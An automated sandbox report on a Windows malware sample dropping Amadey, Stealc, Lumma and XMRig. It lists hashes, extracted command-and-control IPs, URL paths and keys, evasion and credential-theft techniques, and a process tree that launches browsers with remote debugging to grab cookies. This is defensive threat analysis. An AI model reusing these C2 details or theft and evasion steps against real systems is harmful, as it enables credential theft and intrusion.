amadey | be82a54ad40f41f68d1782f36aaed93740e8a8e6d260dc3a0647b86891adceba

Analysis

max time kernel
57s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-12-2024 10:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.7MB
MD5

33e0089f5540f422b3b5da19757c3b05
SHA1

d3cb7c119fafc2b8c2c3cfa51ba7809bc7980aa7
SHA256

be82a54ad40f41f68d1782f36aaed93740e8a8e6d260dc3a0647b86891adceba
SHA512

ef03db70b942cb7431293c8d6c923ba40ecd750b01407c01503ccb4736cd01aa1d7b89a4183d635f26bdb01b463ab4ed66fa2c930018c158dfe076a7976ef6e5
SSDEEP

49152:klZZ9EPhVjVglHBpRcVcUGwlZHBx0H/PbL:klZEPhpVglHfyWUG+hyn

Score

10^/10

amadey lumma stealc xmrig 9c9aa5 default_valenciga drum fed3aa credential_access discovery dropper evasion execution miner spyware stealer trojan upx

Malware Config

Extracted

Family

stealc

Botnet

drum

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

http://185.215.113.16

Attributes

install_dir
44111dbc49
install_file
axplong.exe
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
url_paths
/Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

lumma

https://drive-connect.cyou

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3628 created 2568	3628	rhnew.exe	44

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rhnew.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JJDBAAEGDB.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/3012-331-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-336-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-338-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-341-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-342-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-348-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-343-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-344-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig
behavioral2/memory/3012-389-0x0000000140000000-0x00000001408F6000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4696	powershell.exe
2324	powershell.exe
4328	powershell.exe
3200	powershell.exe
1512	powershell.exe
4496	powershell.exe
5828	powershell.exe
2328	powershell.exe
4924	powershell.exe
4024	powershell.exe
1620	powershell.exe
3296	powershell.exe

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

pid	Process
5324	bitsadmin.exe
5844	bitsadmin.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1972	chrome.exe
1564	chrome.exe
4700	msedge.exe
4432	msedge.exe
1080	msedge.exe
4848	chrome.exe
4788	chrome.exe
960	msedge.exe
1284	msedge.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JJDBAAEGDB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JJDBAAEGDB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rhnew.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	JJDBAAEGDB.exe

Executes dropped EXE 9 IoCs

pid	Process
4268	JJDBAAEGDB.exe
972	skotes.exe
4560	DU1zDwm.exe
4980	stories.exe
2880	stories.tmp
876	videojet32.exe
2444	skotes.exe
212	MicrosoftEdgeUpdateTaskMachineCoreSC.exe
3628	rhnew.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	JJDBAAEGDB.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	rhnew.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	file.exe

Loads dropped DLL 4 IoCs

pid	Process
4280	file.exe
4280	file.exe
2880	stories.tmp
876	videojet32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0010000000023d23-825.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4280	file.exe
4268	JJDBAAEGDB.exe
972	skotes.exe
2444	skotes.exe
3628	rhnew.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 212 set thread context of 3012	212	MicrosoftEdgeUpdateTaskMachineCoreSC.exe	246

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3012-310-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-312-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-314-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-313-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-323-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-331-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-336-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-338-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-341-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-342-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-348-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-343-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-344-0x0000000140000000-0x00000001408F6000-memory.dmp	upx
behavioral2/memory/3012-389-0x0000000140000000-0x00000001408F6000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	JJDBAAEGDB.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x000b000000023d2d-846.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
1568	3628	WerFault.exe	156
5232	2908	WerFault.exe	184
5768	2908	WerFault.exe	184
6036	3876	WerFault.exe	263

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JJDBAAEGDB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2524	powershell.exe
4060	PING.EXE
3700	ping.exe
1004	powershell.exe
2576	PING.EXE
2884	powershell.exe
1424	PING.EXE

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	file.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
5432	taskkill.exe
5652	taskkill.exe
1880	taskkill.exe
4452	taskkill.exe
5324	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133776951809122750"	chrome.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
1424	PING.EXE
4060	PING.EXE
3700	ping.exe
2576	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3296	schtasks.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
4280	file.exe
4280	file.exe
4280	file.exe
4280	file.exe
4280	file.exe
4280	file.exe
1972	chrome.exe
1972	chrome.exe
4280	file.exe
4280	file.exe
4280	file.exe
4280	file.exe
5064	msedge.exe
5064	msedge.exe
5064	msedge.exe
5064	msedge.exe
3644	msedge.exe
3644	msedge.exe
960	msedge.exe
960	msedge.exe
4280	file.exe
4280	file.exe
4280	file.exe
4280	file.exe
4268	JJDBAAEGDB.exe
4268	JJDBAAEGDB.exe
972	skotes.exe
972	skotes.exe
2884	powershell.exe
2884	powershell.exe
2880	stories.tmp
2880	stories.tmp
1704	powershell.exe
1704	powershell.exe
2444	skotes.exe
2444	skotes.exe
1620	powershell.exe
1620	powershell.exe
212	MicrosoftEdgeUpdateTaskMachineCoreSC.exe
1620	powershell.exe
3628	rhnew.exe
3628	rhnew.exe
3012	explorer.exe
3012	explorer.exe
2524	powershell.exe
2524	powershell.exe
2524	powershell.exe
3628	rhnew.exe
3628	rhnew.exe
3628	rhnew.exe
3628	rhnew.exe
2908	svchost.exe
2908	svchost.exe
2908	svchost.exe
2908	svchost.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1972	chrome.exe
Token: SeCreatePagefilePrivilege	1972	chrome.exe
Token: SeShutdownPrivilege	1972	chrome.exe
Token: SeCreatePagefilePrivilege	1972	chrome.exe
Token: SeShutdownPrivilege	1972	chrome.exe
Token: SeCreatePagefilePrivilege	1972	chrome.exe
Token: SeShutdownPrivilege	1972	chrome.exe
Token: SeCreatePagefilePrivilege	1972	chrome.exe
Token: SeShutdownPrivilege	1972	chrome.exe
Token: SeCreatePagefilePrivilege	1972	chrome.exe
Token: SeShutdownPrivilege	1972	chrome.exe
Token: SeCreatePagefilePrivilege	1972	chrome.exe
Token: SeShutdownPrivilege	1972	chrome.exe
Token: SeCreatePagefilePrivilege	1972	chrome.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeLockMemoryPrivilege	3012	explorer.exe
Token: SeLockMemoryPrivilege	3012	explorer.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	4696	powershell.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
1972	chrome.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
960	msedge.exe
2880	stories.tmp
3012	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4280 wrote to memory of 1972	4280	file.exe	84
PID 4280 wrote to memory of 1972	4280	file.exe	84
PID 1972 wrote to memory of 772	1972	chrome.exe	85
PID 1972 wrote to memory of 772	1972	chrome.exe	85
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 3116	1972	chrome.exe	86
PID 1972 wrote to memory of 4404	1972	chrome.exe	87
PID 1972 wrote to memory of 4404	1972	chrome.exe	87
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88
PID 1972 wrote to memory of 4044	1972	chrome.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1180	attrib.exe
1784	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2568
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2908
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  PID:3012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffff51cc40,0x7fffff51cc4c,0x7fffff51cc58
    3⤵
    PID:772
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2124,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:2
    3⤵
    PID:3116
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1820,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3
    3⤵
    PID:4404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:8
    3⤵
    PID:4044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4848
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4572,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4788
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4640,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
    3⤵
    PID:2324
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,14142547568505112070,17567632231309520045,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8
    3⤵
    PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID:960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
